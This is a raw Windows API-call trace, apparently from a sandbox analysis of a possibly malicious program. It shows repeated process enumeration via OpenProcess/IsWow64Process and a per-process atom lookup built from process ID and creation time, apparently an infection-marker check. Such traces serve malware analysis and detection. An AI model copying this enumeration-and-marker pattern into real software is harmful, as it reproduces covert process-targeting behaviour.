	[0118.301] CloseHandle (hObject=0x698) returned 1
	[0118.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.301] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.301] CloseHandle (hObject=0x698) returned 1
	[0118.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.301] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.301] CloseHandle (hObject=0x698) returned 1
	[0118.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.301] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.301] CloseHandle (hObject=0x698) returned 1
	[0118.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.302] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.302] CloseHandle (hObject=0x698) returned 1
	[0118.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.302] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.302] CloseHandle (hObject=0x698) returned 1
	[0118.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.302] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.303] CloseHandle (hObject=0x698) returned 1
	[0118.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.303] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.303] CloseHandle (hObject=0x698) returned 1
	[0118.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.303] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.303] CloseHandle (hObject=0x698) returned 1
	[0118.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.303] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.303] CloseHandle (hObject=0x698) returned 1
	[0118.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.303] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.303] CloseHandle (hObject=0x698) returned 1
	[0118.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.304] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.304] CloseHandle (hObject=0x698) returned 1
	[0118.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.304] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.304] CloseHandle (hObject=0x698) returned 1
	[0118.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.304] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.304] CloseHandle (hObject=0x698) returned 1
	[0118.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.304] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.304] CloseHandle (hObject=0x698) returned 1
	[0118.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.305] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.305] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.305] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.305] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.305] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.306] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.306] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.306] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.306] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.306] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.306] CloseHandle (hObject=0x698) returned 1
	[0118.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.306] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.307] CloseHandle (hObject=0x698) returned 1
	[0118.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.307] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.307] CloseHandle (hObject=0x698) returned 1
	[0118.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.307] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.307] CloseHandle (hObject=0x698) returned 1
	[0118.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.345] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.345] CloseHandle (hObject=0x698) returned 1
	[0118.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.345] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.347] CloseHandle (hObject=0x698) returned 1
	[0118.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.348] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.348] CloseHandle (hObject=0x698) returned 1
	[0118.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.348] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.348] CloseHandle (hObject=0x698) returned 1
	[0118.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.348] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.348] CloseHandle (hObject=0x698) returned 1
	[0118.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.348] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.348] CloseHandle (hObject=0x698) returned 1
	[0118.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.349] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.349] CloseHandle (hObject=0x698) returned 1
	[0118.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.349] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.349] CloseHandle (hObject=0x698) returned 1
	[0118.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.349] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.349] CloseHandle (hObject=0x698) returned 1
	[0118.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.350] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.350] CloseHandle (hObject=0x698) returned 1
	[0118.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.350] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.350] CloseHandle (hObject=0x698) returned 1
	[0118.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.350] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.350] CloseHandle (hObject=0x698) returned 1
	[0118.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.350] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.350] CloseHandle (hObject=0x698) returned 1
	[0118.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.351] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.351] CloseHandle (hObject=0x698) returned 1
	[0118.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.351] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.351] CloseHandle (hObject=0x698) returned 1
	[0118.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.351] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.351] CloseHandle (hObject=0x698) returned 1
	[0118.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.351] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.351] CloseHandle (hObject=0x698) returned 1
	[0118.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.351] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.351] CloseHandle (hObject=0x698) returned 1
	[0118.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.352] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.352] CloseHandle (hObject=0x698) returned 1
	[0118.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.352] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.352] CloseHandle (hObject=0x698) returned 1
	[0118.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.352] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.352] CloseHandle (hObject=0x698) returned 1
	[0118.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.352] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.352] CloseHandle (hObject=0x698) returned 1
	[0118.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.353] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.353] CloseHandle (hObject=0x698) returned 1
	[0118.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.353] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.353] CloseHandle (hObject=0x698) returned 1
	[0118.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.353] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.353] CloseHandle (hObject=0x698) returned 1
	[0118.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.353] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.353] CloseHandle (hObject=0x698) returned 1
	[0118.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.354] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.354] CloseHandle (hObject=0x698) returned 1
	[0118.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.354] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.354] CloseHandle (hObject=0x698) returned 1
	[0118.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.354] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.354] CloseHandle (hObject=0x698) returned 1
	[0118.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.355] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.355] CloseHandle (hObject=0x698) returned 1
	[0118.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.355] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.355] CloseHandle (hObject=0x698) returned 1
	[0118.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.355] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.355] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.356] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.356] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.356] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.356] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.356] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.357] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.357] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.357] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.357] CloseHandle (hObject=0x698) returned 1
	[0118.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.357] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.357] CloseHandle (hObject=0x698) returned 1
	[0118.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.357] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.357] CloseHandle (hObject=0x698) returned 1
	[0118.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.358] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.358] CloseHandle (hObject=0x698) returned 1
	[0118.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.393] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.393] CloseHandle (hObject=0x698) returned 1
	[0118.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.393] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.393] CloseHandle (hObject=0x698) returned 1
	[0118.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.394] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.394] CloseHandle (hObject=0x698) returned 1
	[0118.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.394] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.394] CloseHandle (hObject=0x698) returned 1
	[0118.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.394] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.395] CloseHandle (hObject=0x698) returned 1
	[0118.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.395] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.395] CloseHandle (hObject=0x698) returned 1
	[0118.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.395] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.395] CloseHandle (hObject=0x698) returned 1
	[0118.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.395] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.395] CloseHandle (hObject=0x698) returned 1
	[0118.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.396] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.396] CloseHandle (hObject=0x698) returned 1
	[0118.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.399] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.399] CloseHandle (hObject=0x698) returned 1
	[0118.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.400] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.400] CloseHandle (hObject=0x698) returned 1
	[0118.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.400] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.400] CloseHandle (hObject=0x698) returned 1
	[0118.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.400] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.400] CloseHandle (hObject=0x698) returned 1
	[0118.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.400] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.401] CloseHandle (hObject=0x698) returned 1
	[0118.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.401] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.401] CloseHandle (hObject=0x698) returned 1
	[0118.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.401] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.401] CloseHandle (hObject=0x698) returned 1
	[0118.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.401] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.401] CloseHandle (hObject=0x698) returned 1
	[0118.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.401] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.401] CloseHandle (hObject=0x698) returned 1
	[0118.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.402] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.402] CloseHandle (hObject=0x698) returned 1
	[0118.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.402] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.402] CloseHandle (hObject=0x698) returned 1
	[0118.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.402] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.402] CloseHandle (hObject=0x698) returned 1
	[0118.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.402] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.402] CloseHandle (hObject=0x698) returned 1
	[0118.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.403] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.403] CloseHandle (hObject=0x698) returned 1
	[0118.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.403] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.403] CloseHandle (hObject=0x698) returned 1
